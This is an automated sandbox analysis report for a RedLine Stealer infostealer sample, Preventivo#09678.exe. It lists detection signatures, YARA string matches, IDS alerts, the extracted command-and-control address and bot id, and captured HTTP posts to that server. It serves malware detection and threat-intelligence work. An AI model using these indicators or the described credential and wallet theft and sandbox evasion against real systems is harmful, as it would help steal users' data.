Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Preventivo#09678.exe

Overview

General Information

Sample name:Preventivo#09678.exe
Analysis ID:1555180
MD5:761710e429b4487833e5f9695da7a981
SHA1:eb09e34e35e06d4fee5f01bf57124a80c0e61917
SHA256:82b00503241fb05e5891a11a701a6706fbe2319cffe309c16df7517cfe259011
Tags:exeuser-lowmal3
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Preventivo#09678.exe (PID: 5092 cmdline: "C:\Users\user\Desktop\Preventivo#09678.exe" MD5: 761710E429B4487833E5F9695DA7A981)
    • jsc.exe (PID: 6936 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
      • conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 6560 cmdline: C:\Windows\system32\WerFault.exe -u -p 5092 -s 1152 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["193.70.111.186:13484"], "Bot Id": "hyce"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000007.00000002.1432476685.00000000031E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 11 entries
              SourceRuleDescriptionAuthorStrings
              7.2.jsc.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                7.2.jsc.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  7.2.jsc.exe.400000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x135ca:$a4: get_ScannedWallets
                  • 0x12428:$a5: get_ScanTelegram
                  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                  • 0x1106a:$a7: <Processes>k__BackingField
                  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0x1099e:$a9: <ScanFTP>k__BackingField
                  7.2.jsc.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1048a:$u7: RunPE
                  • 0x13b41:$u8: DownloadAndEx
                  • 0x9130:$pat14: , CommandLine:
                  • 0x13079:$v2_1: ListOfProcesses
                  • 0x1068b:$v2_2: get_ScanVPN
                  • 0x1072e:$v2_2: get_ScanFTP
                  • 0x1141e:$v2_2: get_ScanDiscord
                  • 0x1240c:$v2_2: get_ScanSteam
                  • 0x12428:$v2_2: get_ScanTelegram
                  • 0x124ce:$v2_2: get_ScanScreen
                  • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x13509:$v2_2: get_ScanBrowsers
                  • 0x135ca:$v2_2: get_ScannedWallets
                  • 0x135f0:$v2_2: get_ScanWallets
                  • 0x13610:$v2_3: GetArguments
                  • 0x11cd9:$v2_4: VerifyUpdate
                  • 0x165ea:$v2_4: VerifyUpdate
                  • 0x139ca:$v2_5: VerifyScanRequest
                  • 0x130c6:$v2_6: GetUpdates
                  • 0x165cb:$v2_6: GetUpdates
                  0.2.Preventivo#09678.exe.213dbf0c578.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 15 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T15:02:36.873290+010020229301A Network Trojan was detected20.12.23.50443192.168.2.749730TCP
                    2024-11-13T15:03:14.847087+010020229301A Network Trojan was detected4.245.163.56443192.168.2.749944TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T15:02:32.758524+010020450001Malware Command and Control Activity Detected193.70.111.18613484192.168.2.749699TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T15:02:35.793333+010020450011Malware Command and Control Activity Detected193.70.111.18613484192.168.2.749699TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T15:02:27.715629+010028496621Malware Command and Control Activity Detected192.168.2.749699193.70.111.18613484TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T15:02:33.019894+010028493511Malware Command and Control Activity Detected192.168.2.749699193.70.111.18613484TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T15:02:37.850321+010028482001Malware Command and Control Activity Detected192.168.2.749744193.70.111.18613484TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-13T15:02:35.854568+010028493521Malware Command and Control Activity Detected192.168.2.749731193.70.111.18613484TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0.2.Preventivo#09678.exe.213dbf0c578.3.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["193.70.111.186:13484"], "Bot Id": "hyce"}
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: Preventivo#09678.exeJoe Sandbox ML: detected

                    Exploits

                    barindex
                    Source: Yara matchFile source: 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Preventivo#09678.exe PID: 5092, type: MEMORYSTR
                    Source: Preventivo#09678.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdbx source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdbdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.pdb) source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbe(Syste] source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb0<c source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb/ source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Core.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb1 source: Preventivo#09678.exe, 00000000.00000002.1516742980.00000213C9905000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: Preventivo#09678.exe, 00000000.00000002.1515781633.000000FB88EF2000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Preventivo#09678.exe, 00000000.00000002.1516742980.00000213C9905000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb2 source: Preventivo#09678.exe, 00000000.00000002.1515781633.000000FB88EF2000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdbs\ source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: HC:\Windows\System.Windows.Forms.pdb@ source: Preventivo#09678.exe, 00000000.00000002.1515781633.000000FB88EF2000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Configuration.pdbpx source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Core.pdbP source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Xml.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: Preventivo#09678.exe, 00000000.00000002.1516742980.00000213C9977000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdbRSDS source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdbP source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbngI source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Configuration.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Configuration.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Xml.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Drawing.pdbH source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: Preventivo#09678.exe, 00000000.00000002.1516742980.00000213C9905000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp, Preventivo#09678.exe, 00000000.00000002.1515781633.000000FB88EF2000.00000004.00000010.00020000.00000000.sdmp, WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: mscorlib.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Windows.Forms.pdbt source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdbk source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Drawing.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Core.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Windows.Forms.pdbF9E-7F9C-4437-8B11-F424491E3931}\ServerF9C-4437-8B11-F424491E3931}\InprocServer32 source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: Preventivo#09678.exe, 00000000.00000002.1516742980.00000213C9977000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: symbols\dll\System.Windows.Forms.pdb source: Preventivo#09678.exe, 00000000.00000002.1515781633.000000FB88EF2000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb source: Preventivo#09678.exe, 00000000.00000002.1536007808.00000213E3E40000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WERCF7B.tmp.dmp.11.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERCF7B.tmp.dmp.11.dr
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeCode function: 4x nop then jmp 00007FFAAC632D02h0_2_00007FFAAC632AB5
                    Source: C:\Users\user\Desktop\Preventivo#09678.exeCode function: 4x nop then jmp 00007FFAAC633E8Ch0_2_00007FFAAC633C81

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.7:49699 -> 193.70.111.186:13484
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 193.70.111.186:13484 -> 192.168.2.7:49699
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.7:49699 -> 193.70.111.186:13484
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 193.70.111.186:13484 -> 192.168.2.7:49699
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.7:49731 -> 193.70.111.186:13484
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.7:49744 -> 193.70.111.186:13484
                    Source: Malware configuration extractorURLs: 193.70.111.186:13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49744
                    Source: global trafficTCP traffic: 192.168.2.7:49699 -> 193.70.111.186:13484
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 193.70.111.186:13484Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 193.70.111.186:13484Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 193.70.111.186:13484Content-Length: 954608Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 193.70.111.186:13484Content-Length: 954600Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49730
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:49944
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 193.70.111.186:13484Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000007.00000002.1432476685.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000007.00000002.1432476685.00000000032BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.70.111.186:13484
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.70.111.186:13484/
                    Source: jsc.exe, 00000007.00000002.1432476685.00000000032BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.70.111.186:13484t-
                    Source: jsc.exe, 00000007.00000002.1432476685.00000000034CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: jsc.exe, 00000007.00000002.1432476685.00000000031E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: jsc.exe, 00000007.00000002.1432476685.00000000032BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000007.00000002.1432476685.00000000031E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: jsc.exe, 00000007.00000002.1432476685.00000000032BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: jsc.exe, 00000007.00000002.1432476685.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000007.00000002.1432476685.0000000003719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: jsc.exe, 00000007.00000002.1432476685.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
                    Source: jsc.exe, 00000007.00000002.1433976735.0000000004380000.00000004.00000800.00020000.00000000.sdmp, tmpD714.tmp.7.dr, tmpFEF.tmp.7.dr, tmp4809.tmp.7.dr, tmpF8B.tmp.7.dr, tmpFBC.tmp.7.dr, tmpFCD.tmp.7.dr, tmp47F8.tmp.7.dr, tmpFDF.tmp.7.dr, tmpFAC.tmp.7.dr, tmpF9B.tmp.7.dr, tmpFCE.tmp.7.dr, tmpD713.tmp.7.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: jsc.exe, jsc.exe, 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
